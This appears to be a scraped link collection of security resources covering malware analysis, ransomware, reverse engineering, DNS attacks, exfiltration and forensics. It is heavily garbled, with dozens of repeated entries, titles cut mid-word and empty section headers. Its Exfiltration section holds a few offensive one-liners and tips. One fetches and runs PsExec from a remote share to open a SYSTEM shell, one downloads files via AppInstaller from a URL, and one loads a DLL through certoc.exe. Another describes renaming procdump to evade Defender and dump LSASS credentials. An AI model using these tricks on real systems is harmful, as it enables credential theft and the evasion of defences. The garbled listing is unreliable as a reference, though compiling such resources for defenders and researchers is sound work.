- Sandbox detection and evasion techniques. How malware has evolved over the last 10 years
- Go Assembly on the arm64
- Exploit Kit still sharpens a sword
- Pingback
- WinAPI-Tricks
- Cuckoo Sandbox Overview
- Malvuln
- Machine Learning for Static Malware Analysis, with University College London
- Vigilante malware rats out software pirates while blocking ThePirateBay
- Necro Python bot adds new exploits and Tezos mining to its bag of tricks
- Made in China: OSX.ZuRu
- DBatLoader: Abusing Discord to Deliver Warzone RAT
- Siloscape
- DRIDEX
- The Return of the Malwarebytes Crackme - crackme-3): Writeup and scripts for the 2021 malwarebytes crackme. [Malwarebytes CrackMe 3 2021 Solution](https://rainbowpigeon.me/posts/malwarebytes-crackme-3-2021/)
- Corvus
- MalAPI.io
- Malicious Document Analysis: Example 1 - 1.pdf)
- APIVADS - Preserving Pivot Attack Detection Scheme Based On Statistical Pattern Recognition
- Unprotect
- Chaos: a Stolen Backdoor Rising Again
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Malboxes
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Too Log; Didn't Read — Unknown Actor Using CLFS Log Files for Stealth
- A new secret stash for “fileless” malware
- What you need to know about “LoJax”—the new, stealthy malware from Fancy Bear
- Unprotect
- list
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- GhostDNSbusters
- Unprotect
- Unprotect
- A collection of tools for working with TrickBot
- imaginaryC2 - and-Control responses/served payloads.
- A collection of x64dbg scripts
- Unprotect
- Unprotect
- Unprotect
- Triton is the world’s most murderous malware, and it’s spreading
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
- Unprotect
-
Malware Samples
- Architecture of a ransomware
- Automated Malware Analysis Report for D6pnpvG2z7 - Generated by Joe Sandbox
- Mac Malware
- Detricking TrickBot Loader - stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
- Analysis of Emotet v4
- abuse.ch Feodo Tracker Botnet C2 IP Blocklist
- Mirai "Batkek"
- FinFisher Filleted 🐟
- Ryuk’s Return
- Ryuk Ransomware
- Collaboration between FIN7 and the RYUK group, a Truesec Investigation
- Architecture of a ransomware
- After finding skimmers in SVG files last week, we now discovered a #magecart skimmer in perfectly valid CSS.
- #Buer #BuerLoader
- SoReL-20M - ReversingLabs 20 million sample dataset.
- Purple Fox Rootkit Now Propagates as a Worm
- How to analyze mobile malware: a Cabassous/FluBot Case study
- Malware Analysis of a Password Stealer
- Guildma
- Darkside RaaS in Linux version
- Architecture of a ransomware
- Analysis of Emotet v4
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Collaboration between FIN7 and the RYUK group, a Truesec Investigation
- Architecture of a ransomware
- Detricking TrickBot Loader - stealer called Dyre. It is still believed that those two families might’ve been developed by the same actor. [decoder](https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-07-29-trickbot-decoded-first-loader-template.vk.raw), [tweet](https://twitter.com/VK_Intel/status/1155923795674316801)
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
- Architecture of a ransomware
-
Malware Articles and Sources
- “VANILLA” malware
- “VANILLA” malware
- A Mix of Python & VBA in a Malicious Word Document
- MalwareAnalysisForHedgehogs
- EMOTET
- A MIPS-32 ELF non-resident virus with false disassembly
- Linux.Kropotkine.asm
- A WILD KOBALOS APPEARS - ioc/tree/master/kobalos)
- List of victim organizations attacked by Ransomware gangs released on the DarkWeb
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- 2020-10-22 - TRAFFIC ANALYSIS EXERCISE - OMEGACAST
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- “VANILLA” malware
- A WILD KOBALOS APPEARS - ioc/tree/master/kobalos)
-
Web Malwares
- Boa release
- New evasion techniques found in web skimmers
- digital skimming / #magecart technique for injecting convincing PayPal iframes into the checkout process - anywhere](https://gist.github.com/krautface/e9fece3a3271bc19bd198a72fa8f363e), [stega-loader](https://gist.github.com/krautface/47144708de5ebf78713db10bb486ea87), [paypal-cors-deob-good.js](https://gist.github.com/krautface/dee181bec40b8e99e21fc932d9922df2), [paypal-cors-deob-with-comments.js](https://gist.github.com/krautface/933b050eb363e20cf1bc925c87a9290f), [fake-paypal.html](https://gist.github.com/krautface/243aabc63f6f7424ff75e8e9cbd35016)
-
Repos
- malware.one
- Beginner Malware Reversing Challenges - Reversing-Challenges)
- MalwareWorld
- MalwareBazaar
- What is MWDB Core? - core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
- Malpedia
- What is MWDB Core? - core](https://github.com/CERT-Polska/mwdb-core): Malware repository component for samples & static configuration with REST API interface.
-
Ransomwares
- Player 3 Has Entered the Game: Say Hello to 'WannaCry'
- WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm
- Ransomware Overview
- Analyzing GrandSoft Exploit Kit
- Tracking REvil
- Sodinokibi (aka REvil) Ransomware
- REvil Master Key for Kaseya Attack Posted to XSS
- After the ransom was paid, the attackers even provided some bonus security advice!
- Sophisticated new Android malware marks the latest evolution of mobile ransomware
- Genetic Analysis of CryptoWall Ransomware
- Brazilian Justice Court Ransomware: Another piece in the Puzzle
- A Ransomware has landed! @Embraer
- RANSOMWARE GUIDANCE AND RESOURCES
- No More Ransom!
- PYSA/Mespinoza Ransomware
- PYSA Ransomware
- Mespinoza Analysis — New ransomware variant targets France
- Some #PYSA / #Mespinoza #Ransomware Samples
- Cerber Ransomware
- RansomEXX Trojan attacks Linux systems
- FIN7 - Lizar client Interface version 2.0.4
- Introducing COLT – Compromise to Leak Time
- RANSOM MAFIA.ANALYSIS OF THE WORLD’S FIRST RANSOMWARE CARTEL
- Sleuthing DarkSide Crypto-Ransom Payments with the Wolfram Language
- Apostle Ransomware Analysis
- From Wiper to Ransomware | The Evolution of Agrius
- Hades Ransomware Operators Use Distinctive Tactics and Infrastructure
- BlackMatter x64 Linux Variant | esxcli variant - vitali/Malware-Misc-RE/blob/master/2021-08-05-blackmatter-ransom-linux-esxcli-func-vk.raww)
- Teaching an Old Dog New Tricks: 2017 Magniber Ransomware Uses PrintNightmare Vulnerability to Infect Victims in South Korea
- RansomExx Renner
- RANSOMWHERE
- Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus - cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
- Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation
- Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
- Schroedinger’s Pet(ya)
- Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise
-
Virus/Anti-Virus
- Avast open-sources its machine-code decompiler
- make a process unkillable?!
- Attack inception
- Curtis' Blog: Bypassing Next Gen AV During a Pentest
- BinariesThatDoesOtherStuff
- The ELF Virus Writing HOWTO
- Virus Total API in Python
- Antivirus Event Analysis Cheat Sheet v1.7.2
- UglyEXe
- Engineering antivirus evasion
- An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
- The ELF Virus Writing HOWTO
- The ELF Virus Writing HOWTO
- Inception - memory compilation and reflective loading of C# apps for AV evasion.
- The ELF Virus Writing HOWTO
-
Trojans/Loggers
-
-
Links
-
- The 4th in the 5th: Temporal Aspects of Cyber Operations
- FIRST
- Malware Analysis Resources
- Cert.BR - useful [links](https://www.cert.br/links/)
- 7º Fórum Brasileiro de CSIRTs
- 9º Fórum Brasileiro de CSIRTs
- list
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
- Shodan - connected devices. [Shodan 2000](https://2000.shodan.io/)
- CriminalIP - related information such as malicious IP addresses, domains, banners, etc. It can be widely integrated
- SPLOITUS
- Vulmon
- CIS SecureSuite® Membership
- CRYPTO101
- CPDoS
- The 4th in the 5th: Temporal Aspects of Cyber Operations
- Open CSIRT Foundation - [SIM v3 Model](http://opencsirt.org/wp-content/uploads/2019/12/SIM3-mkXVIIIc.pdf) and [SIM3 Self Assessment](https://sim3-check.opencsirt.org).
- Global Forum on Cyber Expertise (GFCE)
- Ten strategies of a world-class cybersecurity operations center
- Institute for Security and Technology - traditional approach has a bias towards action, as we build trust across domains, provide unprecedented access, and deliver and implement solutions.
- NIST'S CYBERSECURITY FRAMEWORK
- Illustrated X.509 Certificate
- DWF
- OpenEX - Platform/openex)
- NCSI
- THE EVOLUTION OF TRUST
- list
- hacking-tutorials
- crypto
- tink - language, cross-platform library that provides cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse.
- SMHasher - cryptographic hash functions. [another repo](https://github.com/aappleby/smhasher)
- cacao - open.org/committees/tc_home.php?wg_abbrev=cacao)
- cti-documentation
- SOCless - labs/socless)
- my-infosec-awesome
- How to Secure Anything
- Metasploitable3
- pluto-eris - pairing cycle of elliptic curves.
- cset
- comply
- Open Security Controls Assessment Language (OSCAL) - , JSON-, and YAML-based formats that provide a standardized representations of information pertaining to the publication, implementation, and assessment of security controls.
- OASIS Common Security Advisory Framework (CSAF) - tcs/csaf) [secvisogram](https://github.com/secvisogram/secvisogram) [editor](https://secvisogram.github.io/)
- notrandom
- 9º Fórum Brasileiro de CSIRTs
- APT & CyberCriminal Campaign Collection
- Encoding vs. Encryption vs. Hashing vs. Obfuscation
-
Incident Response
- Applying DevOps Principles in Incident Response
- Pagerduty Incident Response
- Request Tracker
- CSIRT Schiltron: Training, Techniques, and Talent
- Practical Tabletop Drills for CSIRTS - Pre-session Material
- Critical Log Review Checklist for Security Incidents
- Exercise in a Box
- Incident response overview
- How to Write and Execute Great Incident Response Playbooks
- Incident Response: Windows Cheatsheet
- Incident Response: Windows Account Logon and logon Events
- Incident Response: Windows Account Management Event (Part 2)
- Incident Response- Linux Cheatsheet
- Building Better CSIRTs Using Behavioral Psychology - 21/briefings/schedule/index.html#building-better-csirts-using-behavioral-psychology-24331)
- The features all Incident Response Plans need to have
- security-training
- incident-response-docs
- global-irt
- atc-react
- Beagle
- DFIRTrack
- FIR
- Aurora Incident Response
- timesketch
- FastIR Collector Linux
- Maltrail
-
Hashing
- MD5 Decryption
- SHA-1 is a Shambles - Prefix Collision on SHA-1 and Application to the PGP Web of Trust
- Sha256 Algorithm Explained
-
-
Reverse Engineering
-
Malware Articles and Sources
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- Fundamentos de Engenharia Reversa
- Dangers of the Decompiler
- RE guide for beginners: Methodology and tools
- Reversing ARM Binaries
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- Reverse Engineering for Beginners
- rattle
- Reversing a Japanese Wireless SD Card From Zero to Code Execution
- Reverse engineering Go binaries using Radare 2 and Python
- IDAPro Cheat Sheet
- IDA Python
- TLS callbacks
- rename gamemaker handlers
- Generic Anomalies - executable file
- Controlling GDB
- Low Level Visualization via Debuggers
- Faster GDB Startup
- Getting Started with Frida Tools
- Immunity Debugger
- mona
- LIEF - project/LIEF/))
- DEBIN
- Analyzing ARM Cortex-based MCU firmwares using Binary Ninja
- Manticore
- Beam me up, CFG. - for example, from exploits that overwrite an address in the stack. Maybe they should call it the Security Directory instead.
- Linux Reverse Engineering CTFs for Beginners
- Reverse Engineering of a Not-so-Secure IoT Device
- Python for Reverse Engineering 1
- The 101 of ELF files on Linux - Linux Audit
- On ELF, Part 1
- On ELF, Part 2
- Kaitai Struct
- Reverse Engineering 'A Link to the Past (GBA)' ep 1
- wiggle
- Reverse-engineering precision op amps from a 1969 analog computer
- Qiling Framework
- Tales Of Binary Deobfuscation - Part 1
- Deobfuscating DanaBot’s API Hashing
- Deobfuscation - protected program
- VX Underground
- Como automaticamente atachar um processo a um debugger.
- Taming Virtual Machine Based Code Protection
- playing with little endian
- flare-floss - Automatically extract obfuscated strings from malware.
- #BazarBackdoor Group #CobaltStrike Payload
- The Debugging Book
- Debugging System with DCI and Windbg - to-SMM LPE exploit & demo](https://twitter.com/standa_t/status/1376525000002334725), [SmmExploit](https://github.com/tandasat/SmmExploit).
- SCAS/SCASB/SCASW/SCASD
- Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)
- Reverse engineering (Absolute) UEFI modules for beginners
- Reverse Engineering the M6 Smart Fitness Bracelet
- Reverse Engineering a Linux executable – hello world
- OpenSecurityTraining2 - 1180701) is a 501c3 non-profit working to create the world's best cybersecurity training.
- Nightmare
- Sometimes static analysis of shellcode is annoying or infeasible, And what you really want to do is debug it, I'll show you how
- Reverse Engineering PsExec for fun and knowledge
- Reverse Engineering TikTok's VM Obfuscation
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- part 1 - hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)
- IDA Python
- CPU Adventure – Unknown CPU Reversing - engineered a program written for a completely custom, unknown CPU architecture, without any documentation for the CPU (no emulator, no ISA reference, nothing) in the span of ten hours. Read on to find out how we did it…
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- IDA Python
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- Practical-Reverse-Engineering-using-Radare2
- IDA Python
- some things about gef
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- Finding memory bugs with AddressSanitizer
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
- part 1 - hooking-android-part-2/), [part 3](https://11x256.github.io/Frida-hooking-android-part-3/), [part 4](https://11x256.github.io/Frida-hooking-android-part-4/) and [part 5](https://11x256.github.io/Frida-hooking-android-part-5/)
- BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)
- IDA Python
-
Decompilers
- decompile_java - another java decompiler.
- edb - platform AArch32/x86/x86-64 debugger.
-
Yara
- mkYARA - it/mkyara))
- xored_pefile_mini
- ThreatHunting
-
Ghidra
- ghidra
- Decompiler Analysis Engine - flow analysis on software, starting from the binary executable.
- Working With Ghidra's P-Code To Identify Vulnerable Function Calls
- GhIDA - Talos/GhIDA).
- SVD-Loader for Ghidra - metal ARM reverse engineering. [repo](https://github.com/leveldown-security/SVD-Loader-Ghidra)
- Introduction to Reverse Engineering with Ghidra: A Four Session Course
- Ghidra Plugin Development for Vulnerability Research - Part-1
- Defeating Code Obfuscation with Angr
- ghidra2frida
- Reversing Raw Binary Firmware Files in Ghidra
- IDA Graph view with outlined function included
- G-3PO: A Protocol Droid for Ghidra
- Reverse Engineering Go Binaries with Ghidra
-
-
DNS
-
Purple Team
- Unbound DNS Blacklist
- Plight At The End Of The Tunnel
- subzy
- Subdomain Takeover Scanner
- subdomain-takeover
- DNSCrypt - proxy 2](https://github.com/DNSCrypt/dnscrypt-proxy), [resolvers](https://github.com/DNSCrypt/dnscrypt-resolvers) and [docker image](https://github.com/DNSCrypt/dnscrypt-server-docker).
- pdns-qof
- dnsdbq
- How to enable bind query logging to find out Who’s Querying a Name Server
- BIND Logging - some basic recommendations
- BIND 9 logging best practices
- BIND9 Configuration Guide
- Thwarting and detecting malware with RPZ and OSSEC
- The Importance of DNS Logging in Enterprise Security
- DNSObserver - of-band DNS interactions and sends lookup notifications via Slack. [Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor](https://www.allysonomalley.com/2020/05/22/dnsobserver/)
- Plight At The End Of The Tunnel
- dns-rebind-toolkit - end JavaScript toolkit for creating DNS rebinding attacks.
- SubR3con
- TakeOver-v1
- Subdomain Takeover Scanner
- subdomain-takeover
- DNSCrypt - proxy 2](https://github.com/DNSCrypt/dnscrypt-proxy), [resolvers](https://github.com/DNSCrypt/dnscrypt-resolvers) and [docker image](https://github.com/DNSCrypt/dnscrypt-server-docker).
- How to enable bind query logging to find out Who’s Querying a Name Server
- BIND Logging - some basic recommendations
- BIND9 Configuration Guide
- Thwarting and detecting malware with RPZ and OSSEC
- The Importance of DNS Logging in Enterprise Security
- DNSObserver - of-band DNS interactions and sends lookup notifications via Slack. [Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor](https://www.allysonomalley.com/2020/05/22/dnsobserver/)
- Unbound DNS Blacklist
- sad dns - path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- NtHiM - Super Fast Sub-domain Takeover Detection!
- Passive DNS - Common Output Format - scanning-techniques/blob/main/slides/active-scanning.pdf)
- DNS loophole makes nation-state level spying as easy as registering a domain - dns-checker.tools.wiz.io/)
- sad dns - path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- NtHiM - Super Fast Sub-domain Takeover Detection!
- Passive DNS - Common Output Format - scanning-techniques/blob/main/slides/active-scanning.pdf)
- DNS loophole makes nation-state level spying as easy as registering a domain - dns-checker.tools.wiz.io/)
- dref
- sad dns - path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
- Can I take over XYZ?
-
-
Exfiltration
-
Purple Team
- Windows TCPIP Finger Command
- Script for searching the extracted firmware file system for goodies!
- Twitter Scraper
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- whois | GTFOBins
- PacketWhisper - Based Steganography. [PacketWhisper](https://github.com/TryCatchHCF/PacketWhisper): Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease
- okhttp-peer-certificate-extractor
- awesome-python-login-model
- Script for searching the extracted firmware file system for goodies!
- DKMC - Dont kill my cat
- Tunna
- gitleaks
- tinfoleak - source tool for Twitter intelligence analysis
- Social IDs
- Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
- accountanalysis
- How to get authentication key from SNMPv3 packets
- AtomicTestsCommandLines.txt - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
- whois | GTFOBins
- ssh-keygen can be used to load shared libraries
- Browsers affected by the History API DoS
- PacketWhisper - Based Steganography. [PacketWhisper](https://github.com/TryCatchHCF/PacketWhisper): Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
- Using Google Analytics for data extraction
- Exfiltrating credentials via PAM backdoors & DNS requests
- Building simple DNS endpoints for exfiltration or C&C
- CheckPlease
- okhttp-peer-certificate-extractor
- awesome-python-login-model
- Hamburglar
- Living Off The Land Binaries and Scripts (and also Libraries) - [github](https://github.com/LOLBAS-Project/LOLBAS)
- Windows TCPIP Finger Command
- Living Off Windows Land – A New Native File “downldr”
- Ttdinject.exe
- Exfiltrate Like a Pro
- Cloakify-Factory: - Based Steganography. [Cloakify](https://github.com/TryCatchHCF/Cloakify): Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
- Chameleon
- DNSExfiltrator
- Data Exfiltration using Linux Binaries
- Exploring the WDAC Microsoft Recommended Block Rules: kill.exe
- Desperate downloader
- I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source=<url>
- C:\Windows\System32\Cmdl32.exe
- I shot the sigverif.exe – the GUI-based LOLBin
- \\http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe
- Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?
- C:\Windows\System32\WorkFolders.exe
- C:\Windows\System32\certoc.exe -LoadDLL <DLLName>
- Ttdinject.exe
- Exfiltrate Like a Pro
- Cloakify-Factory: - Based Steganography. [Cloakify](https://github.com/TryCatchHCF/Cloakify): Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
- DNSExfiltrator
- Data Exfiltration using Linux Binaries
- Desperate downloader
- I shot the sigverif.exe – the GUI-based LOLBin
- Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
- Living off the land
- if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
- Living off the land
- It's not a forgotten legacy code, it's recidivism
- Windows TCPIP Finger Command
- accountanalysis
- Building simple DNS endpoints for exfiltration or C&C
- Desperate downloader
- Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service
- Python Keylogger Using Mailtrap.io
- DNSExfiltrator
-
Steganography
- How To Hide Data in Images Using Python
- A list of useful tools and resources
- stegsolve
- Unicode Text Steganography Encoders/Decoders
- Simple Image Steganography in Python
- Aperi'Solve
- Stegseek
- A list of useful tools and resources
- stegsolve
- Unicode Text Steganography Encoders/Decoders
- Simple Image Steganography in Python
- How To Hide Data in Images Using Python
- Aperi'Solve
- Stegseek
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- Aperi'Solve
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
- How To Hide Data in Images Using Python
-
-
Forensics
-
Steganography
- Tsurugi Linux
- libelfmaster
- usbrip
- Digital Forensics and Incident Response
- Linux Incident Response Guide
- Cloud Forensics Triage Framework (CFTF)
- Forensic Investigation
- Invoke-LiveResponse
- Linux Forensics
- mac_apt
- imago-forensics
- remedi-infrastructure
- Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
- O-Saft
- Linux Forensics
- Invoke-LiveResponse
- mac_apt
- imago-forensics
- remedi-infrastructure
- Tsurugi Linux
- usbrip
- Digital Forensics and Incident Response
- KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. [blog post](https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape). [KAPE docs](https://ericzimmerman.github.io/KapeDocs/) and [KAPE Files](https://github.com/EricZimmerman/KapeFiles)
- file Signatures
- OfficeForensicTools
- FBI Electronic Tip For
- CHIRP
- Hash Cracking with AWS and hashcat
- Hashcat new feature: autodetect hash-mode
- L0phtCrack - force, hybrid attacks, and rainbow tables. [gitlab repo](https://gitlab.com/l0phtcrack/l0phtcrack)
- TrID
- image-unshredding
- KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. [blog post](https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape). [KAPE docs](https://ericzimmerman.github.io/KapeDocs/) and [KAPE Files](https://github.com/EricZimmerman/KapeFiles)
- Eric Zimmerman's Tools
- MacQuisition - in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
- file Signatures
- OfficeForensicTools
- FBI Electronic Tip For
- CHIRP
- Hashcat new feature: autodetect hash-mode
- L0phtCrack - force, hybrid attacks, and rainbow tables. [gitlab repo](https://gitlab.com/l0phtcrack/l0phtcrack)
- FastIR Artifacts
- Cloud Forensics Triage Framework (CFTF)
- Forensic Investigation
- exif-gps-tracer
- ShredOS x86_64 - Disk Eraser - Secure disk erasure/wipe.
- dfir_ntfs
- LeechCore
- ShredOS x86_64 - Disk Eraser - Secure disk erasure/wipe.
- dfir_ntfs
- Linux Forensics
- Tsurugi Linux
- Digital Forensics and Incident Response
- file Signatures
- Cloud Forensics Triage Framework (CFTF)
- Forensic Investigation
- FBI Electronic Tip For
-
PDF
- PDF Tools
- How to Protect Files With Canary Tokens
- Attacks on PDF Certification
- How to remove malicious code from PDF files
- mu tools
- PDF forensics with Kali Linux : pdfid and pdfparser
- How can I extract a JavaScript from a PDF file with a command line tool?
- Shadow Attacks … the smallest attack vector ever
- Attacks on PDF Certification
- How to remove malicious code from PDF files
- mu tools
- PDF forensics with Kali Linux : pdfid and pdfparser
- How can I extract a JavaScript from a PDF file with a command line tool?
- Insecure Features in PDFs. - in-security.blogspot.com/2021/01/insecure-features-in-pdfs.html)
- Shadow Attacks … the smallest attack vector ever
- mu tools
- PDF forensics with Kali Linux : pdfid and pdfparser
- How can I extract a JavaScript from a PDF file with a command line tool?
- Shadow Attacks … the smallest attack vector ever
- How to remove malicious code from PDF files
-
Email Headers
-
Distros
-
Volatility
- Volatility profiles for Linux and Mac OS X
- Building a profile for Volatility
- OROCHI
- AutoVolatility
- Volatility, my own cheatsheet (Part 1): Image Identification
- First steps to volatile memory analysis
- Building a profile for Volatility
- OROCHI
- AutoVolatility
- Memory Forensics and Analysis Using Volatility
- First steps to volatile memory analysis
- Building a profile for Volatility
- Memory Forensics and Analysis Using Volatility
-
-
Mobile
-
Android
- mvt
- android-security-awesome
- A Story About Three Bluetooth Vulnerabilities in Android
